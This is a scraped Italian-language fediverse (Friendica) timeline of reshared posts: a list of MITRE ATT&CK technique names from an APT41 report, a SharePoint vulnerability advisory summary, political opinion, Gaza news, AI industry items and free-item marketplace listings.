Valid Accounts: Domain AccountsT1078.002
Defense EvasionHijack Execution Flow: DLL Side-LoadingT1574.002
Deobfuscate/Decode Files or InformationT1140
Indicator Removal: File DeletionT1070.004
MasqueradingT1036
Process InjectionT1055
Credential AccessCredentials from Password Stores: Credentials from Web BrowsersT1555.003
OS Credential Dumping: Security Account ManagerT1003.002
Unsecured CredentialsT1552
DiscoveryNetwork Service DiscoveryT1046
Process DiscoveryT1057
System Information DiscoveryT1082
System Network Configuration DiscoveryT1016
Lateral movementLateral Tool TransferT1570
Remote Services: SMB/Windows Admin SharesT1021.002
CollectionArchive Collected Data: Archive via UtilityT1560.001
Automated CollectionT1119
Data from Local SystemT1005
Command and ControlApplication Layer Protocol: Web ProtocolsT1071.001
Application Layer Protocol: DNST1071.004
Ingress Tool TransferT1105
Proxy: Internal ProxyT1090.001
Protocol TunnelingT1572
ExfiltrationExfiltration Over Alternative ProtocolT1048
Exfiltration Over Web ServiceT1567

securelist.com/apt41-in-africa…

Gazzetta del Cadavere reshared this.

friendica (DFRN) - Collegamento all'originale
I cialtroni UE vedono i russi dappertutto, un'ossessione che da più anni, continua a renderli ridicoli di fronte al mondo intero.l

friendica (DFRN) - Collegamento all'originale

Short dubbing
locutortv.com/drama-dubbing/

Drama dubbing. Short drama dubbing. Drama dubbed -

Drama dubbing. Drama dubbed. Short drama dubbing. Short drama dubbed. Drama dubbing studios. Drama dubbing company
LOCUTOR TV LOCUTORES: SPANISH VOICE OVER

friendica (DFRN) - Collegamento all'originale

I giornalisti uccisi e il diritto a verità e giustizia


@Giornalismo e disordine informativo
articolo21.org/2025/07/i-giorn…
Mio figlio Andrea Rocchelli, ucciso a Sloviansk nel 2014, da un attacco con armi pesanti e leggere ad opera delle forze armate ucraine, come ha stabilito la magistratura italiana, da 11 anni a questa parte non

@Giornalismo e disordine informativo

friendica (DFRN) - Collegamento all'originale

FREEDOM FLOTILLA. La Handala fa rotta su Gaza


@Notizie dall'Italia e dal mondo
La nave prende il nome da "Handala", il celebre bambino dei fumetti palestinesi creato da Naji al-Ali: un rifugiato scalzo, che volta le spalle all’ingiustizia. La testimonianza video di Antonio Mazzeo
L'articolo FREEDOM pagineesteri.it/2025/07/21/med…

@Notizie dall'Italia e dal mondo

friendica (DFRN) - Collegamento all'originale

Vulnerabilità nei prodotti Microsoft Office SharePoint Server

L'ACSC dell'ASD è a conoscenza di una vulnerabilità che colpisce i prodotti Microsoft Office SharePoint Server (CVE-2025-53770).

CVE-2025-53770 comporta la deserializzazione di dati non attendibili nei server Microsoft SharePoint locali, consentendo a un aggressore non autorizzato di eseguire codice su una rete.

Microsoft è a conoscenza dell'esistenza di un exploit per CVE-2025-53770 e ha osservato attacchi attivi rivolti ai clienti di SharePoint Server locale.

Microsoft sta preparando e testando a fondo un aggiornamento completo per risolvere questa vulnerabilità.

cyber.gov.au/about-us/view-all…

@Informatica (Italy e non Italy 😁)

@Informatica (Italy e non Italy 😁)

friendica (DFRN) - Collegamento all'originale
se proprio non ti piace la democrazia e vuoi fare la dittatura, l'unica dittatura che trovo funzionale è quella alla romana. una durata comunque rigorosamente limitata con al termine della quale il giudizio della nazione sull'operato. non esistono altri modi per avere garanzie che la dittatura non scivoli fuori controllo e non diventi contraria agli interessi della nazione. il dittatore di turno, che sia cinese, israeliano, nord coreano, turco, russo, o americano (trump), non può esimersi dal fare comunque l'interesse della nazione invece di dare priorità al mantenimento personale del potere. una nazione non può diventare schiava degli interessi del proprio leader.

friendica (DFRN) - Collegamento all'originale
Il PD dimostra per l'ennesima volta, il partito escremento che è.
ilfattoquotidiano.it/2025/07/2…

friendica (DFRN) - Collegamento all'originale

Tutto su Kimi K2, la nuova super AI cinese che spaventa Chatgpt e soci

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
La potenza di calcolo è quella delle Intelligenze artificiali di fascia premium, ma i costi per i clienti saranno notevolmente inferiori: ecco perché molto presto le software house occidentali potrebbero avere a che

#StartMag @Informatica (Italy e non Italy 😁)
in reply to Informa Pirata

🧊 freezr 🥶
friendica - Collegamento all'originale
🧊 freezr 🥶

@Informa Pirata @Informatica (Italy e non Italy 😁)

Unn giorno le AI aiuteranno a capire investitori e venture capitalists il motivo per cui fracassarono ignobilmente...

@Informa Pirata @Informatica (Italy e non Italy 😁)
Questa voce è stata modificata (1 mese fa)

friendica (DFRN) - Collegamento all'originale

Tulsi Gabbard: «Processate Barack Obama e Hillary Clinton, hanno complottato contro Trump»

Il rapporto dell'intelligence su La Bufala Russa. La direttrice: un colpo di Stato durato anni, ci sono prove schiaccianti
Alessandro D’Amato (Open)

friendica (DFRN) - Collegamento all'originale
oggi nel cestino dell'umido, avvitato allo sportello dell'acquaio, si è realizzato lo scenario peggiore. l'intero sacchetto di umido si è separato a metà e l'intero contenuto è rimasto agganciato incollato al fondo. in seguito a questo tragico evento ho pensato di inserire l'instabile sacchetto per umido dentro un sacchetto di quelli che distruggono l'ambiente con ferocia e non si disgregano in 5 secoli. dopo che era successo. a pensarci bene avrei potuto immaginare che prima o poi sarebbe successo, e pensarci prima. ma purtroppo l'umanità (me inclusa) è composta da mentecatti non capaci di pensare al futuro, ma a malapena quasi capaci gestire il presente (la reazione istintiva non sempre è la migliore). per questo su un analogo problema, solo su scala più grande, come il cambiamento climatico siamo fottuti e destinati a estinguerci. siamo geneticamente tarati e incapaci di gestire noi stessi e le conseguenze delle nostre azioni. geneticamente programmati e condannati al fallimento. come tutto in natura del resto.

friendica (DFRN) - Collegamento all'originale

Il 30 luglio è la giornata mondiale contro il traffico di esseri umani

"La tratta di esseri umani è criminalità organizzata: poniamo fine allo sfruttamento"

La tratta di esseri umani continua a essere una minaccia globale, alimentata dalla criminalità organizzata. Ogni anno vengono trafficate sempre più vittime, su distanze maggiori, con maggiore violenza, per periodi di tempo più lunghi e per maggiori profitti. Dal 2020 al 2023, sono state rilevate oltre 200.000 vittime a livello globale, il che rappresenta solo la punta dell'iceberg. Si ritiene che il numero effettivo di casi non segnalati sia significativamente più alto.

Le reti criminali organizzate alimentano questa vittimizzazione e sfruttamento, utilizzando flussi migratori, catene di approvvigionamento globali, scappatoie legali ed economiche e piattaforme digitali per facilitare la tratta transfrontaliera su larga scala. Traggono profitto dal lavoro forzato, dallo sfruttamento sessuale e dalla coercizione ad attività criminali, come le truffe online e il traffico di droga.

Nonostante alcuni progressi, le risposte della giustizia penale sono insufficienti nell'affrontare questo crimine in rapida evoluzione.

Per porre fine alla tratta di esseri umani, le forze dell'ordine devono applicare leggi rigorose, condurre indagini proattive, rafforzare la cooperazione transfrontaliera, contrastare il finanziamento del crimine e sfruttare la tecnologia per identificare e smantellare le reti di tratta.

Garantire giustizia alle vittime richiede che i responsabili siano chiamati a rispondere delle proprie azioni e che venga fornito un approccio incentrato sulla vittima per quanto riguarda protezione, supporto e accesso alla giustizia.

La campagna di quest'anno di UNODC (United Nations Office on Drugs and Crime) sottolinea il ruolo fondamentale delle forze dell'ordine e del sistema giudiziario penale nello smantellare le reti di tratta organizzate, garantendo al contempo un'assistenza centrata sulle vittime.

Il Rapporto Globale UNODC sulla Tratta di Persone del 2024, l'ottavo in ordine di tempo ed ultimo pubblicato, commissionato dall'Assemblea Generale attraverso il Piano d'Azione Globale delle Nazioni Unite del 2010 per combattere la Tratta di Persone, fornisce un'istantanea dei modelli e dei flussi della tratta a livello globale, regionale e nazionale. Copre 156 paesi e garantisce una panoramica della risposta alla tratta di persone analizzando i casi di tratta rilevati tra il 2019 e il 2023. Un focus principale di questa edizione del Rapporto è sui trend di rilevamenti e condanne, che mostrano i cambiamenti rispetto ai trend storici da quando l'UNODC ha iniziato a raccogliere dati nel 2003 e a seguito della pandemia di Covid-19.

I risultati sono ulteriormente arricchiti dall'analisi delle sintesi di oltre 1000 casi giudiziari giudicati tra il 2012 e il 2023, fornendo approfondimenti sul crimine, sulle sue vittime e sui suoi autori, e su come la tratta di persone giunge all'attenzione delle autorità.

L'edizione presenta un quadro globale delle tendenze, dei modelli e dei flussi della tratta (Capitolo 1), insieme ad analisi regionali dettagliate (Capitolo 3). Vi è inoltre un capitolo speciale sull'Africa (Capitolo 2), prodotto allo scopo di svelare i modelli e i flussi della tratta all'interno del continente africano. Il capitolo si basa su un numero senza precedenti di paesi africani presi in considerazione nel Rapporto Globale.

Il Rapporto [en] è scaricabile qui unodc.org/documents/data-and-a…

@Notizie dall'Italia e dal mondo

#trattadipersone #trafficodiesseriumani

#trafficodiesseriumani #trattadipersone

fabrizio reshared this.

friendica (DFRN) - Collegamento all'originale

“Sundown”, di Michel Franco, Mex-Sve-Fra, 2021. Con Tim Roth, Charlotte Gainsbourg


@Giornalismo e disordine informativo
articolo21.org/2025/07/sundown…
Michel Franco ha realizzato con “Sundown” un film silenzioso e privo di spiegazioni, e per questo potentemente umano. Tim Roth,

@Giornalismo e disordine informativo

friendica (DFRN) - Collegamento all'originale

Perché Google, Microsoft e OpenAi sgomitano per Windsurf?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Contesa da tre grandi aziende, forse persino alla base dei dissapori tra Microsoft e Sam Altman di OpenAi, alla fine Windsurf ha sorpreso tutti: i due co-founder e altri ragazzi geniali hanno riparato in Mountain View

#StartMag @Informatica (Italy e non Italy 😁)

friendica (DFRN) - Collegamento all'originale
per quanto tempo ancora la nostra inesistente coscienza o la parvenza di umanità ci permetterà di guardare altrove?

Oltre 80 morti nei raid a Gaza: 73 uccisi mentre attendevano cibo LIVE

Leggi su Sky TG24 l'articolo Guerra Israele, almeno 84 morti nei raid a Gaza: 73 uccisi mentre attendevano cibo. LIVE
tg24.sky.it

reshared this

friendica (DFRN) - Collegamento all'originale

Tutti i problemi Sony con gli smartphone. Xperia 1 VII non avrà eredi?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
I tempi in cui il marchio giapponese attraverso Sony-Ericsson dominava i mercati in furibondi testa-a-testa con Nokia sembrano solo un lontano ricordo. Sony pare intenzionata a ridisegnare le geografie di vendita dei suoi smartphone:

#StartMag @Informatica (Italy e non Italy 😁)

friendica (DFRN) - Collegamento all'originale

Gaza. 60 mila i morti, oltre 115 mila i feriti; più di 2 milioni gli sfollati. E’ accettabile tutto questo?


@Giornalismo e disordine informativo
articolo21.org/2025/07/gaza-60…
Rimarrà probabilmente fino ad oggi a Gaza il cardinale pizzaballa che dopo l’attacco alla chiesa cattolica della

@Giornalismo e disordine informativo

friendica (DFRN) - Collegamento all'originale

Processo Open Arms e ricorso in Cassazione per Saltum. Perché?


@Giornalismo e disordine informativo
articolo21.org/2025/07/process…
La Procura di Palermo ha deciso nel caso OpenArms,di puntare direttamente alla Corte di Cassazione. Secondo i PM: “L’assoluzione non supportata da ragioni giuridiche”. Il ministro Nordio

@Giornalismo e disordine informativo

friendica (DFRN) - Collegamento all'originale

Il Governo Meloni ha svenduto anche la nostra salute a Trump


@Giornalismo e disordine informativo
articolo21.org/2025/07/il-gove…
Noi più in là con gli anni coltiviamo la speranza di non dover più vivere una pandemia del genere Covid 19, ma la scienza, unanime, dice che una prossima pandemia arriverà fra non molti anni e

@Giornalismo e disordine informativo

friendica (DFRN) - Collegamento all'originale

Dylan Dog presenta Groucho n. 7 anno 1993. - Questo è un post automatico da FediMercatino.it

Prezzo: 0 Euro

Dylan Dog presenta Groucho n. 7 anno 1993.

Nel blog troverete fumetti gratuiti di ogni genere, ma non perdere tempo sono tra gli articoli più richiesto.

CLICCA QUI PER VISITARE IL BLOG

Questa occasione puoi sfruttarla nella pagina articoli gratuiti

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️

@Il Mercatino del Fediverso 💵♻️

friendica (DFRN) - Collegamento all'originale

Rivista Il Borghese del 1973 nella foto. - Questo è un post automatico da FediMercatino.it

Prezzo: 0 Euro

Per chi vuole avere notizie dal passato questa è l'occasione giusta ed a costo zero.

Nel blog troverete tantissimi annunci di articoli gratuiti di ogni genere.

CLICCA QUI

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️

@Il Mercatino del Fediverso 💵♻️

reshared this

friendica (DFRN) - Collegamento all'originale

Rivista Gioia Salute Bellezza n. 12 anno 1985 - Questo è un post automatico da FediMercatino.it

Prezzo: 0 Euro

Scopri come si curava la bellezza e la salute negli anni 80..

Nel blog troverete tantissimi annunci di articoli gratuiti di ogni genere.

CLICCA QUI

🔗 Link su FediMercatino.it per rispondere all'annuncio

@Il Mercatino del Fediverso 💵♻️

@Il Mercatino del Fediverso 💵♻️

reshared this

friendica (DFRN) - Collegamento all'originale
Il primo grande discrimine che si può porre tra questo Milton di Beppe Fenoglio e i suoi successori è la sua innata predisposizione alla violenza adrianomaini.altervista.org/il…

friendica (DFRN) - Collegamento all'originale

Rami Abu Jamous: diario da Gaza
orientxxi.info/dossiers-et-ser…

reshared this

friendica (DFRN) - Collegamento all'originale

Così l’IA ridisegna missioni, dati e potere nel settore spaziale. Scrive Lisi

@Notizie dall'Italia e dal mondo

L’intelligenza artificiale (IA) sta rivoluzionando il settore spaziale, trasformando missioni, operazioni e analisi dei dati, e ridefinendo le dinamiche geopolitiche globali. È un pilastro della Nuova Economia Spaziale (NSE), che ha democratizzato l’accesso allo

@Notizie dall'Italia e dal mondo

friendica (DFRN) - Collegamento all'originale

quando micro$oft si fa tradurre l'aiuto in linea dall'Idiota Artificiale

friendica (DFRN) - Collegamento all'originale

Difesa e sicurezza, quanto costerà davvero l’obiettivo del 5%? Il punto di Braghini

@Notizie dall'Italia e dal mondo

L’obiettivo di spesa entro il 2035 del 5%, e precisamente del 3,5% per la difesa in senso stretto e dell’1,5% per la security, richiesto da Washington ai Paesi membri della NATO, ha aperto un ampio dibattito. Per la NATO, le spese per la difesa dei Paesi

@Notizie dall'Italia e dal mondo

friendica (DFRN) - Collegamento all'originale

Geschichten aus dem DSC-Beirat: Wie Trumps Drohungen europäische Grundrechte gefährden

netzpolitik.org/2025/geschicht…